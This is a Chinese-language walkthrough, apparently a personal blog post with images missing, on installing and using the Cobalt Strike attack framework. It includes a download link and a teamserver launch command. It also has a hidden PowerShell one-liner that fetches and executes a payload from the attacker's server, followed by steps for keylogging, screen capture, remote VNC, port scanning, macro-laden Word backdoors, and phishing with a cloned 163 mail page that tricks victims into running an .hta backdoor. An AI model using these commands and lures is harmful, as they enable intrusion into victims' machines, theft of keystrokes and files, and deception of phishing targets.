Cobalt Strike
- 安装
- 启动
- 启动server端
- 启动client
- 目标机器连接
- 工具基使用
- 用户驱动攻击
- 屏幕截图
- 进程列表
- 键盘记录
- 文件管理
- 远程vnc
- 远程代理
- 端口扫描
- 生成后门
- 被攻击者运行后门文件后查看结果
- 钓鱼攻击
- 信息收集
- 网站克隆
- 文件下载
安装
网盘地址:链接:https://pan.baidu.com/s/1GgKaueOjXUz_LPw34GjUWQ
提取码:0dqp
启动
启动server端
sudo ./teamserver 192.168.0.107 123456 # ip + 密码
启动client
目标机器连接
- 创建监听器
复制内容
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.0.107:8080/a’))”
- 受害机执行利用语句
工具基使用
用户驱动攻击
屏幕截图
进程列表
键盘记录
-
选中需要监听应用后点击log keystrokes
-
被攻击电脑操作键盘
-
结束任务
jobs #查看已有任务
jobkill id值 #结束某任务
文件管理
远程vnc
查看用户操作页面
远程代理
》》然后本机的浏览器代理可以设置为上面的代理地址,我这没ie浏览器就不进行展示
端口扫描
方法一:使用页面功能直接扫描
方法二:命令行输入
portscan 192.168.0.109 1-1024,3389,5000-6000 arp 1024
扫描结果查看
查看服务情况
生成后门
方法一:
方法二:
wps方式:
新建word文件,开发工具中点击js宏,指定宏名称和宏位置
删除以有内容,复制生成的宏内容到word文件中
另存为带宏的文件
》》没办法运行就不展示运行结果了
方法三:
被攻击者运行后门文件后查看结果
钓鱼攻击
信息收集
被攻击者浏览器运行生成的地址
http://192.168.0.107:80/baidu
》》不知道什么原因应用信息并没有查询到
网站克隆
已163邮箱为例子
文件下载
思路:
让被攻击者访问我们克隆的网站时,诱导目标下载后门文件并运行
- 生成后门文件地址
http://192.168.0.107:80/test.hta
2. 克隆网站
3. 目标网站浏览器运行地址并下载运行后门文件